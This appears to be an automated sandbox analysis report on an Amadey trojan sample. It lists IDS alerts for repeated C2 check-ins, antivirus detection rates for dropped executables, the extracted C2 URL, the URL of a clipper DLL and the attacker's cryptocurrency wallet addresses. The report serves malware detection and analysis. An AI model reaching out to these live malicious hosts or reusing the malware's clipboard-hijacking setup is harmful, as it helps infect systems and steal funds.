                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450300802027700 02/08/23-17:40:11.733230
                            SID:2027700
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450331802027700 02/08/23-17:40:21.630470
                            SID:2027700
                            Source Port:50331
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450153802027700 02/08/23-17:39:33.775747
                            SID:2027700
                            Source Port:50153
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450283802027700 02/08/23-17:40:07.638780
                            SID:2027700
                            Source Port:50283
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450194802027700 02/08/23-17:39:45.998769
                            SID:2027700
                            Source Port:50194
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450319802027700 02/08/23-17:40:18.663429
                            SID:2027700
                            Source Port:50319
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450023802027700 02/08/23-17:39:01.855210
                            SID:2027700
                            Source Port:50023
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450064802027700 02/08/23-17:39:11.871504
                            SID:2027700
                            Source Port:50064
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449903802027700 02/08/23-17:38:25.713449
                            SID:2027700
                            Source Port:49903
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450303802027700 02/08/23-17:40:12.489380
                            SID:2027700
                            Source Port:50303
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449944802027700 02/08/23-17:38:37.430400
                            SID:2027700
                            Source Port:49944
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449725802027700 02/08/23-17:37:32.936276
                            SID:2027700
                            Source Port:49725
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449855802027700 02/08/23-17:38:12.691905
                            SID:2027700
                            Source Port:49855
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449896802027700 02/08/23-17:38:24.036974
                            SID:2027700
                            Source Port:49896
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449985802027700 02/08/23-17:38:51.647161
                            SID:2027700
                            Source Port:49985
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449814802027700 02/08/23-17:37:57.900701
                            SID:2027700
                            Source Port:49814
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected


                            AV Detection

                            Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll, URL Reputation: Label: malware
                            Source: 62.204.41.4/Gol478Ns/index.php, URL Reputation: Label: malware
                            Source: http://62.204.41.4/Gol478Ns/index.php, URL Reputation: Label: malware
                            Source: file.exe, ReversingLabs: Detection: 69%
                            Source: file.exe, Virustotal: Detection: 52%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\clip64[1].dll, ReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, ReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe, ReversingLabs: Detection: 51%
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, ReversingLabs: Detection: 80%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe, ReversingLabs: Detection: 35%
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, ReversingLabs: Detection: 81%
                            Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, ReversingLabs: Detection: 80%
                            Source: file.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Joe Sandbox ML: detected
                            Source: 19.2.mnolyk.exe.d50000.0.unpack, Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                            Source: 21.2.rundll32.exe.6f460000.0.unpack, Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010E2F1D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe, Code function: 1_2_00A72F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00A72F1D

                            Compliance

                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe, Unpacked PE file: 2.2.aTaf.exe.400000.0.unpack
                            Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\aTaf.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: file.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.312037051.00000000052D0000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000000.444906113.000000000139E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.446524500.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.834452126.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.451321345.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.450744153.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000000.531763918.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000016.00000002.531978816.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000000.658255066.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001A.00000002.658522671.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000002.787572067.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001B.00000000.786896647.0000000000D7E000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                            Source: Binary string: Healer.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wextract.pdbGCTL source: file.exe, bmKg.exe.0.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004BBA000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.416696337.00000000001F2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                            Source: Binary string: _.pdb source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: QC:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 00000009.00000002.834626616.0000000001485000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.834537684.000000006F46F000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                            Source: Binary string: Healer.pdbH5 source: aTaf.exe, 00000002.00000002.415511177.0000000002350000.00000004.08000000.00040000.00000000.sdmp, aTaf.exe, 00000002.00000002.415726088.0000000002601000.00000004.00000800.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415355869.0000000001FE0000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000002.415653987.0000000002510000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\gabebuneyitu besefahuc_wewi.pdb source: bmKg.exe, 00000001.00000003.312737185.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, aTaf.exe, 00000002.00000000.312858921.0000000000401000.00000020.00000001.01000000.00000005.sdmp, aTaf.exe.1.dr
                            Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010E2390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmKg.exe, Code function: 1_2_00A72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A72390
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Code function: 8_2_0138FC58 FindFirstFileExW,8_2_0138FC58

                            Networking

                            Source: Traffic, Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49695 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49840 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49843 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49845 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49847 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49849 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49852 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49854 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49858 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49860 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49862 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49865 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49869 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49875 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49878 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49883 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49889 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49892 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49897 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49898 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49899 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49900 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49902 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49903 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49907 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49909 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49914 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49923 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49927 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49933 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49946 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49954 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49958 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49959 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49962 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49975 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49978 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 62.204.41.4:80
